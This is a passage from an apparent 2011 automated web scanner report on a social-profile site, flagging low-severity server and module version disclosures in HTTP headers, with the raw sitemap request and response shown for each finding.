<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

OpenSSL/0.9.8g

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

mod_perl/2.0.3

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
